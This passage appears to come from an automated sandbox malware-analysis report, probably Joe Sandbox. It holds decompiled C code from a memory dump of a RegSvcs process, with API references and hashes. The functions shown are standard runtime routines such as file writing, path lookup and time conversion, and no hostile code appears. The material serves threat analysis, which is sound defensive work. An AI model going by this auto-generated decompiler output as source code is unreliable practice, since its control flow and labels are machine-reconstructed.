										_t240 =  &(_v52[_v76]);
										L21:
										_t201 = _t240 - 1;
										L31:
										_v52 = _t201 + 1;
										_t205 = E0044A6C3(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
										_t315 = _t316 + 0x20;
										_v60 = _t205;
										if(_t205 != 0) {
											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
												L50:
												 *_t307 = GetLastError();
											} else {
												_t292 = _v52;
												_t210 =  *((intOrPtr*)(_t307 + 8)) + _t292 - _v100;
												_v76 = _t210;
												 *((intOrPtr*)(_t307 + 4)) = _t210;
												if(_v96 >= _v60) {
													if(_v53 != 0xa) {
														goto L38;
													} else {
														_t212 = 0xd;
														_v92 = _t212;
														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
															goto L50;
														} else {
															if(_v96 >= 1) {
																 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t307 + 8)) + 1;
																 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + 1;
																_t292 = _v52;
																_v76 =  *((intOrPtr*)(_t307 + 4));
																goto L38;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L38:
					} while (_t292 < _v88);
				}
				L51:
				 *[fs:0x0] = _v16;
				_pop(_t299);
				_pop(_t308);
				_pop(_t266);
				return E00431C58(_t307, _t266, _v20 ^ _t313, _t292, _t299, _t308);
				goto L52;
			}

0x00447c0f
0x00447c11
0x00447c1c
0x00447c1d
0x00447c20
0x00447c25
0x00447c27
0x00447c2d
0x00447c31
0x00447c37
0x00447c3c
0x00447c42
0x00447c45
0x00447c48
0x00447c4b
0x00447c4e
0x00447c51
0x00447c5b
0x00447c5e
0x00447c62
0x00447c6a
0x00447c6d
0x00447c73
0x00447c77
0x00447c7a
0x00447c7e
0x00447c7e
0x00447c83
0x00447c83
0x00447c86
0x00447c8b
0x00447c8e
0x00447c93
0x00447c94
0x00447c95
0x00447c96
0x00447c99
0x00447c9b
0x00447ca1
0x00447ca7
0x00447caa
0x00447cac
0x00447caf
0x00447cb8
0x00447cbe
0x00447cc1
0x00447cc8
0x00447ccf
0x00447cd2
0x00447e0c
0x00447e10
0x00447e13
0x00447e36
0x00447e3c
0x00447e3e
0x00447e42
0x00447e73
0x00447e76
0x00447e78
0x00000000
0x00447e44
0x00447e44
0x00447e47
0x00447e4a
0x00447e4d
0x00447f97
0x00447fa5
0x00447fae
0x00447e53
0x00447e5d
0x00447e62
0x00447e65
0x00447e68
0x00447e6e
0x00000000
0x00447e6e
0x00447e68
0x00447e4d
0x00447e15
0x00447e1c
0x00447e1f
0x00447e22
0x00447e24
0x00447e27
0x00447e2e
0x00447e30
0x00447e79
0x00447e7c
0x00447e7d
0x00447e82
0x00447e85
0x00447e88
0x00447e8e
0x00000000
0x00447e8e
0x00447e88
0x00447cd8
0x00447cdb
0x00447cdd
0x00447cdf
0x00447ce3
0x00447ce4
0x00447ce8
0x00000000
0x00000000
0x00000000
0x00447ce8
0x00447ced
0x00447cef
0x00447cf4
0x00447db4
0x00447dbb
0x00447dbc
0x00447dbf
0x00447dc1
0x00447f71
0x00447f73
0x00000000
0x00447f75
0x00447f75
0x00447f78
0x00447f87
0x00447f8b
0x00447f8c
0x00447f8c
0x00000000
0x00447f90
0x00000000
0x00447dc7
0x00447dcc
0x00447dcf
0x00447dd2
0x00447dd8
0x00447de1
0x00447dec
0x00447df1
0x00447df4
0x00447df7
0x00447e00
0x00447e00
0x00447e03
0x00000000
0x00447e03
0x00447df7
0x00447cfa
0x00447cfd
0x00447d03
0x00447d05
0x00447d12
0x00447d13
0x00447d16
0x00447d19
0x00447d1e
0x00447f42
0x00447f44
0x00447f46
0x00447f49
0x00447f4c
0x00447f58
0x00447f5b
0x00447f5d
0x00447f5e
0x00447f62
0x00447f65
0x00447f65
0x00447f69
0x00447f69
0x00447f69
0x00447f6c
0x00447f6c
0x00447d24
0x00447d24
0x00447d27
0x00447d29
0x00447d2c
0x00447d2e
0x00447d32
0x00447d33
0x00447d34
0x00447d38
0x00447d3d
0x00447d47
0x00447d4c
0x00447d4f
0x00447d4f
0x00447d52
0x00447d55
0x00447d57
0x00447d5a
0x00447d63
0x00447d67
0x00447d68
0x00447d6f
0x00447d75
0x00447d7d
0x00447d88
0x00447d8d
0x00447d98
0x00447d9d
0x00447da3
0x00447dac
0x00447e06
0x00447e06
0x00447e91
0x00447e96
0x00447ea8
0x00447ead
0x00447eb0
0x00447eb5
0x00447ed0
0x00447fb3
0x00447fb9
0x00447ed6
0x00447ed6
0x00447ee1
0x00447ee3
0x00447ee6
0x00447eef
0x00447ef9
0x00000000
0x00447efb
0x00447efd
0x00447eff
0x00447f18
0x00000000
0x00447f1e
0x00447f22
0x00447f28
0x00447f2b
0x00447f31
0x00447f34
0x00000000
0x00447f34
0x00447f22
0x00447f18
0x00447ef9
0x00447eef
0x00447ed0
0x00447eb5
0x00447da3
0x00447d1e
0x00447cf4
0x00000000
0x00447f37
0x00447f37
0x00447f40
0x00447fbb
0x00447fc0
0x00447fc8
0x00447fc9
0x00447fca
0x00447fd6
0x00000000

APIs

GetConsoleOutputCP.KERNEL32(05959051,0044CA66,00000000,?), ref: 00447C6D

Part of subcall function 0044A6C3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0044EB2E,?,00000000,-00000008), ref: 0044A76F

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00447EC8
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00447F10
GetLastError.KERNEL32 ref: 00447FB3

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 69e98c5db46f9ed5d53ddd39ce9b3e5deeb7c147cc4e053aca37aa66ba9326dd
Instruction ID: 479c093becb3f2157322cade23d4fb601e674fa5c3a677bce25f1dc59560248d
Opcode Fuzzy Hash: 69e98c5db46f9ed5d53ddd39ce9b3e5deeb7c147cc4e053aca37aa66ba9326dd
Instruction Fuzzy Hash: B4D18BB5D042489FEB11CFA8C8809EDFBB5FF49304F28416AE856E7351E734A946CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00450B56 Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E00450B56(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x45f148);
				E00431A30(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E00433E20(_t107, E00431E73(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E00433E20(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x460fcc; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x45d9f4();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E00443BF4(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x45f168);
									E00431A30(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E00450B56(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E004506B4(_t103, _t108[0x18], E00431E73( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E004506C4(_t103, _t108[0x18], E00431E73( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E00431E73();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x00450b56
0x00450b58
0x00450b5d
0x00450b62
0x00450b64
0x00450b67
0x00450b6c
0x00450c7c
0x00450c7c
0x00450c7c
0x00000000
0x00450b7b
0x00450b7b
0x00450b80
0x00450b8a
0x00450b8c
0x00450b91
0x00450b96
0x00450b96
0x00450b98
0x00450b9b
0x00450ba0
0x00450bc2
0x00450bc2
0x00450bc5
0x00450bc8
0x00450be6
0x00450be9
0x00450c28
0x00450c2b
0x00450c2e
0x00450c53
0x00450c55
0x00000000
0x00450c57
0x00450c57
0x00450c59
0x00000000
0x00450c5b
0x00450c5b
0x00450c60
0x00450c64
0x00450c64
0x00450c65
0x00000000
0x00450c65
0x00450c59
0x00450c30
0x00450c30
0x00450c32
0x00000000
0x00450c34
0x00450c34
0x00450c36
0x00000000
0x00450c38
0x00450c49
0x00000000
0x00450c4e
0x00450c36
0x00450c32
0x00450beb
0x00450beb
0x00450bef
0x00000000
0x00450bf5
0x00450bf5
0x00450bf7
0x00000000
0x00450bfd
0x00450c04
0x00450c0c
0x00450c10
0x00450c12
0x00450c15
0x00450c1a
0x00450c1b
0x00000000
0x00450c1b
0x00450c15
0x00000000
0x00450c10
0x00450bf7
0x00450bef
0x00450bca
0x00450bca
0x00000000
0x00450bca
0x00450ba7
0x00450ba7
0x00450bac
0x00450bb1
0x00000000
0x00450bb3
0x00450bb5
0x00450bbe
0x00450bcd
0x00450bcf
0x00450c8e
0x00450c8e
0x00450c93
0x00450c94
0x00450c96
0x00450c9b
0x00450ca0
0x00450ca3
0x00450ca6
0x00450ca9
0x00450cb2
0x00450cb2
0x00450cab
0x00450cab
0x00450cab
0x00450cb5
0x00450cb9
0x00450cbc
0x00450cbd
0x00450cbe
0x00450cbf
0x00450cc2
0x00450ccb
0x00450ccb
0x00450cce
0x00450d04
0x00450cd0
0x00450cd0
0x00450cd0
0x00450cd3
0x00450cea
0x00450cea
0x00450cd3
0x00450d09
0x00450d13
0x00450d1f
0x00450bdd
0x00450bdd
0x00450be2
0x00450be3
0x00450c1d
0x00450c24
0x00450c68
0x00450c68
0x00450c6f
0x00450c7e
0x00450c81
0x00450c8d
0x00450c8d
0x00450bcf
0x00450bb1
0x00000000
0x00000000
0x00000000
0x00450b80

APIs

___AdjustPointer.LIBCMT ref: 00450C1D
___AdjustPointer.LIBCMT ref: 00450C40
___AdjustPointer.LIBCMT ref: 00450CDC

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 3a492ae97c0464a7ebf7829d563c09a476ddbe809ae18a0261a1cd6d731851ef
Instruction ID: 294191ea658643933b5cf4096d5e62fd40046d4d1d6e8676fe7036b10a4a8b97
Opcode Fuzzy Hash: 3a492ae97c0464a7ebf7829d563c09a476ddbe809ae18a0261a1cd6d731851ef
Instruction Fuzzy Hash: 3651E5796012069FEB2A9F55C881B6B73A4EF05716F14462FEC01472A2E739ED88C798

Uniqueness

Uniqueness Score: -1.00%

Function 0044AC90 Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0044AC90(void* _a4) {
				char _v9;
				intOrPtr _v16;
				void _v20;
				signed int _t43;
				void _t46;
				intOrPtr _t49;
				signed int _t51;
				signed int _t55;
				signed int _t56;
				void* _t58;
				signed int _t62;
				signed int _t64;
				void* _t66;
				intOrPtr* _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				void _t73;
				void* _t74;
				void* _t75;
				signed int _t78;
				intOrPtr _t80;
				signed int _t83;
				signed int _t85;
				void* _t87;
				void* _t90;
				void* _t96;
				void* _t100;
				void* _t102;
				void* _t103;

				_pop(_t104);
				_t100 = _a4;
				if(_t100 != 0) {
					_t78 = 9;
					memset(_t100, _t43 | 0xffffffff, _t78 << 2);
					_t96 = _a4;
					__eflags = _t96;
					if(_t96 != 0) {
						_t4 = _t96 + 4; // 0x310a74c0
						_t80 =  *_t4;
						_t46 =  *_t96;
						_v20 = _t46;
						_v16 = _t80;
						__eflags = _t80 - 0xffffffff;
						if(__eflags > 0) {
							L8:
							_t87 = 7;
							__eflags = _t80 - _t87;
							if(__eflags < 0) {
								L13:
								_v9 = 0;
								_t49 = E0044ACDD(_t80, __eflags,  &_v20,  &_v9);
								_t73 = _v20;
								 *((intOrPtr*)(_t100 + 0x14)) = _t49;
								_t51 = E00449CA0(_t73, _v16, 0x15180, 0);
								_t83 = _t51;
								 *(_t100 + 0x1c) = _t83;
								_t74 = _t73 - _t51 * 0x15180;
								asm("sbb eax, edx");
								__eflags = _v9;
								_t90 = 0x45aab4;
								if(_v9 == 0) {
									_t90 = 0x45aa80;
								}
								_t55 = 1;
								__eflags =  *((intOrPtr*)(_t90 + 4)) - _t83;
								if( *((intOrPtr*)(_t90 + 4)) < _t83) {
									do {
										_t55 = _t55 + 1;
										__eflags =  *((intOrPtr*)(_t90 + _t55 * 4)) - _t83;
									} while ( *((intOrPtr*)(_t90 + _t55 * 4)) < _t83);
								}
								_t56 = _t55 - 1;
								 *(_t100 + 0x10) = _t56;
								 *((intOrPtr*)(_t100 + 0xc)) = _t83 -  *((intOrPtr*)(_t90 + _t56 * 4));
								_t28 = _t96 + 4; // 0x310a74c0
								_t58 = E00449CA0( *_t96,  *_t28, 0x15180, 0);
								_t85 = 7;
								asm("cdq");
								 *(_t100 + 0x18) = (_t58 + 4) % _t85;
								_t62 = E00449CA0(_t74, _v16, 0xe10, 0);
								 *(_t100 + 8) = _t62;
								_t75 = _t74 - _t62 * 0xe10;
								asm("sbb edi, edx");
								_t64 = E00449CA0(_t75, _v16, 0x3c, 0);
								 *(_t100 + 0x20) =  *(_t100 + 0x20) & 0x00000000;
								 *(_t100 + 4) = _t64;
								_t66 = 0;
								__eflags = 0;
								 *_t100 = _t75 - _t64 * 0x3c;
							} else {
								if(__eflags > 0) {
									goto L11;
								} else {
									__eflags = _t46 - 0x9358efdf;
									if(__eflags <= 0) {
										goto L13;
									} else {
										goto L11;
									}
								}
							}
						} else {
							if(__eflags < 0) {
								L11:
								_t67 = E0043C326();
								_t102 = 0x16;
								 *_t67 = _t102;
								goto L12;
							} else {
								__eflags = _t46 - 0xffff5740;
								if(_t46 < 0xffff5740) {
									goto L11;
								} else {
									goto L8;
								}
							}
						}
					} else {
						_t68 = E0043C326();
						_t102 = 0x16;
						 *_t68 = _t102;
						E004457B7();
						L12:
						_t66 = _t102;
					}
				} else {
					_t70 = E0043C326();
					_t103 = 0x16;
					 *_t70 = _t103;
					E004457B7();
					_t66 = _t103;
				}
				return _t66;
			}

0x0044ac95
0x0044add9
0x0044adde
0x0044adfe
0x0044adff
0x0044ae01
0x0044ae04
0x0044ae06
0x0044ae19
0x0044ae19
0x0044ae1c
0x0044ae1e
0x0044ae21
0x0044ae24
0x0044ae27
0x0044ae32
0x0044ae34
0x0044ae35
0x0044ae37
0x0044ae53
0x0044ae57
0x0044ae60
0x0044ae65
0x0044ae6c
0x0044ae79
0x0044ae7e
0x0044ae87
0x0044ae8a
0x0044ae8f
0x0044ae91
0x0044ae98
0x0044ae9d
0x0044ae9f
0x0044ae9f
0x0044aea6
0x0044aea7
0x0044aeaa
0x0044aeac
0x0044aeac
0x0044aead
0x0044aead
0x0044aeac
0x0044aeb2
0x0044aeb3
0x0044aec1
0x0044aec4
0x0044aec9
0x0044aed6
0x0044aed7
0x0044aee1
0x0044aee7
0x0044aef1
0x0044aef8
0x0044aefc
0x0044af00
0x0044af05
0x0044af09
0x0044af11
0x0044af11
0x0044af13
0x0044ae39
0x0044ae39
0x00000000
0x0044ae3b
0x0044ae3b
0x0044ae40
0x00000000
0x00000000
0x00000000
0x00000000
0x0044ae40
0x0044ae39
0x0044ae29
0x0044ae29
0x0044ae42
0x0044ae42
0x0044ae49
0x0044ae4a
0x00000000
0x0044ae2b
0x0044ae2b
0x0044ae30
0x00000000
0x00000000
0x00000000
0x00000000
0x0044ae30
0x0044ae29
0x0044ae08
0x0044ae08
0x0044ae0f
0x0044ae10
0x0044ae12
0x0044ae4c
0x0044ae4c
0x0044ae4c
0x0044ade0
0x0044ade0
0x0044ade7
0x0044ade8
0x0044adea
0x0044adef
0x0044adef
0x0044af19

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be445befffd34775706ff48ac6a95a7ede1f639710de7cf0f7ddf627e798d621
Instruction ID: b03a119660681fcd2243fa4c18a5bbb6e40d1e016d938f309a53f09e973a9d15
Opcode Fuzzy Hash: be445befffd34775706ff48ac6a95a7ede1f639710de7cf0f7ddf627e798d621
Instruction Fuzzy Hash: 0541D671A80604AFF7249F79C846B5BBBA9EB88714F20852FE011DB282D3799D508785

Uniqueness

Uniqueness Score: -1.00%

Function 00448401 Relevance: 6.1, APIs: 4, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00448401(union _LARGE_INTEGER* __edx, void* _a4, union _LARGE_INTEGER _a8, intOrPtr _a12, signed int _a16) {
				long _v8;
				void* _v12;
				union _LARGE_INTEGER* _v16;
				void* _v20;
				int _t21;
				signed int _t23;
				void* _t25;
				union _LARGE_INTEGER* _t30;

				_t30 = __edx;
				_push(1);
				if(SetFilePointerEx(_a4, 0, 0,  &_v20) == 0) {
					L1:
					_t23 = E0043C3B2(GetLastError(), _a16);
					L7:
					return _t23 | 0xffffffff;
				}
				_push(_a12);
				asm("cdq");
				_v12 = 0;
				_v8 = 0;
				_t21 = SetFilePointerEx(_a4, _a8, _t30,  &_v12);
				__eflags = _t21;
				if(_t21 == 0) {
					goto L1;
				}
				_t25 = _v12;
				__eflags = _v8;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						L6:
						_push(0);
						SetFilePointerEx(_a4, _v20, _v16, 0);
						_t23 = _a16;
						 *((char*)(_t23 + 0x1c)) = 1;
						 *((intOrPtr*)(_t23 + 0x18)) = 0x16;
						goto L7;
					}
					__eflags = _t25 - 0x7fffffff;
					if(_t25 > 0x7fffffff) {
						goto L6;
					}
				}
				return _t25;
			}

0x00448401
0x0044840d
0x0044841f
0x00448421
0x0044842b
0x00448484
0x00000000
0x00448484
0x00448434
0x0044843e
0x00448444
0x00448447
0x0044844a
0x00448450
0x00448452
0x00000000
0x00000000
0x00448454
0x00448457
0x0044845a
0x0044845c
0x00448465
0x00448465
0x00448470
0x00448476
0x00448479
0x0044847d
0x00000000
0x0044847d
0x0044845e
0x00448463
0x00000000
0x00000000
0x00448463
0x00448489

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,0043FD2A,00000001,?,0043FD2A,004011A9,?,00000000), ref: 00448417
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,004011A9,00000000), ref: 00448424
SetFilePointerEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,004011A9,00000000), ref: 0044844A
SetFilePointerEx.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00448470

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: dfa6142a078835f5da790a32e48759ec89f8e234457805aff9a6908f7e33e325
Instruction ID: fb0e428865e6807b70549510c67625b532005a9ee8c6999852f5ba3c10f03cdb
Opcode Fuzzy Hash: dfa6142a078835f5da790a32e48759ec89f8e234457805aff9a6908f7e33e325
Instruction Fuzzy Hash: BB118E71900219BFEF209F95DC089DF7F79EF04365F10411AF824A62A1EB75DA40DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0044D266 Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044D266(void* __ecx, WCHAR** _a4) {
				long _t8;
				LPWSTR* _t11;
				WCHAR** _t19;
				void* _t20;

				_t19 = _a4;
				_t20 = __ecx;
				_t8 = GetFullPathNameW( *_t19,  *(__ecx + 0xc),  *(__ecx + 8), 0);
				if(_t8 == 0) {
					L1:
					E0043C34C(GetLastError());
					return  *((intOrPtr*)(E0043C326()));
				}
				if(_t8 <=  *(_t20 + 0xc)) {
					L5:
					 *(_t20 + 0x10) = _t8;
					return 0;
				}
				_t11 = E0044D164(_t20, _t8 + 1);
				if(_t11 == 0) {
					_t8 = GetFullPathNameW( *_t19,  *(_t20 + 0xc),  *(_t20 + 8), _t11);
					if(_t8 == 0) {
						goto L1;
					}
					goto L5;
				}
				return _t11;
			}

0x0044d26d
0x0044d270
0x0044d27c
0x0044d284
0x0044d286
0x0044d28d
0x00000000
0x0044d298
0x0044d29f
0x0044d2c1
0x0044d2c1
0x00000000
0x0044d2c4
0x0044d2a5
0x0044d2ac
0x0044d2b7
0x0044d2bf
0x00000000
0x00000000
0x00000000
0x0044d2bf
0x0044d2c9

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,0044D15F,00000000,?,004528AC,0044D15F,0043E7B9,?,00000000,00000104,?,00000001,00000000), ref: 0044D27C
GetLastError.KERNEL32(?,004528AC,0044D15F,0043E7B9,?,00000000,00000104,?,00000001,00000000,00000000,?,0044D15F,?,00000104,0043E7B9), ref: 0044D286
__dosmaperr.LIBCMT ref: 0044D28D
GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,004528AC,0044D15F,0043E7B9,?,00000000,00000104,?,00000001,00000000,00000000), ref: 0044D2B7

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: FullNamePath$ErrorLast__dosmaperr
String ID:
API String ID: 1391015842-0
Opcode ID: 2ff7bc100e86d626b3cd20c1ed0037c6b83d9337c4378b0d025b63246e9efb95
Instruction ID: 9da09843ff0697310c16877e7e2dcded3a73ed7bb7e0a83ed0c364a165f34c8e
Opcode Fuzzy Hash: 2ff7bc100e86d626b3cd20c1ed0037c6b83d9337c4378b0d025b63246e9efb95
Instruction Fuzzy Hash: A2F04F3AA00700AFEB306FA6DC08E5BBBB9FF44761710886AF555D2221DB75EC109B58

Uniqueness

Uniqueness Score: -1.00%

Function 0044D2CC Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044D2CC(void* __ecx, WCHAR** _a4) {
				long _t8;
				LPWSTR* _t11;
				WCHAR** _t19;
				void* _t20;

				_t19 = _a4;
				_t20 = __ecx;
				_t8 = GetFullPathNameW( *_t19,  *(__ecx + 0xc),  *(__ecx + 8), 0);
				if(_t8 == 0) {
					L1:
					E0043C34C(GetLastError());
					return  *((intOrPtr*)(E0043C326()));
				}
				__eflags = _t8 -  *(_t20 + 0xc);
				if(__eflags <= 0) {
					L5:
					 *(_t20 + 0x10) = _t8;
					__eflags = 0;
					return 0;
				}
				_t11 = E0044D1F3(_t20, __eflags, _t8 + 1);
				__eflags = _t11;
				if(_t11 == 0) {
					_t8 = GetFullPathNameW( *_t19,  *(_t20 + 0xc),  *(_t20 + 8), _t11);
					__eflags = _t8;
					if(_t8 == 0) {
						goto L1;
					}
					goto L5;
				}
				return _t11;
			}

0x0044d2d3
0x0044d2d6
0x0044d2e2
0x0044d2ea
0x0044d2ec
0x0044d2f3
0x00000000
0x0044d2fe
0x0044d302
0x0044d305
0x0044d327
0x0044d327
0x0044d32a
0x00000000
0x0044d32a
0x0044d30b
0x0044d310
0x0044d312
0x0044d31d
0x0044d323
0x0044d325
0x00000000
0x00000000
0x00000000
0x0044d325
0x0044d32f

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,0044D15F,00000000,?,00452834,0044D15F,0044D15F,0043E7B9,?,00000000,00000104,?,00000001), ref: 0044D2E2
GetLastError.KERNEL32(?,00452834,0044D15F,0044D15F,0043E7B9,?,00000000,00000104,?,00000001,00000000,00000000,?,0044D15F,?,00000104), ref: 0044D2EC
__dosmaperr.LIBCMT ref: 0044D2F3
GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,00452834,0044D15F,0044D15F,0043E7B9,?,00000000,00000104,?,00000001,00000000), ref: 0044D31D

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: FullNamePath$ErrorLast__dosmaperr
String ID:
API String ID: 1391015842-0
Opcode ID: f07f17757dae0319ac632c13a793b47471a8327cc07ca914048cd3dd99ab898f
Instruction ID: 9bcf4abba978f92240f688ffe3e2cab52fb7734b4afb07a3332d3dfabae3f918
Opcode Fuzzy Hash: f07f17757dae0319ac632c13a793b47471a8327cc07ca914048cd3dd99ab898f
Instruction Fuzzy Hash: E3F03C3AA00301AFEB306FA6DC04E57BBB9FF48761714842EF955C2221DB35E8109B59

Uniqueness

Uniqueness Score: -1.00%

Function 00453198 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00453198(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x460b60, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E0045320C();
					E004531ED();
					_t13 = WriteConsoleW( *0x460b60, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x004531b5
0x004531b9
0x004531c6
0x004531cb
0x004531e6
0x004531e6
0x004531ec

APIs

WriteConsoleW.KERNEL32(00000000,0044CA66,00000000,00000000,00000000,?,004513FA,00000000,00000001,00000000,?,?,00448007,?,0044CA66,00000000), ref: 004531AF
GetLastError.KERNEL32(?,004513FA,00000000,00000001,00000000,?,?,00448007,?,0044CA66,00000000,?,?,?,00447952,0043B87D), ref: 004531BB

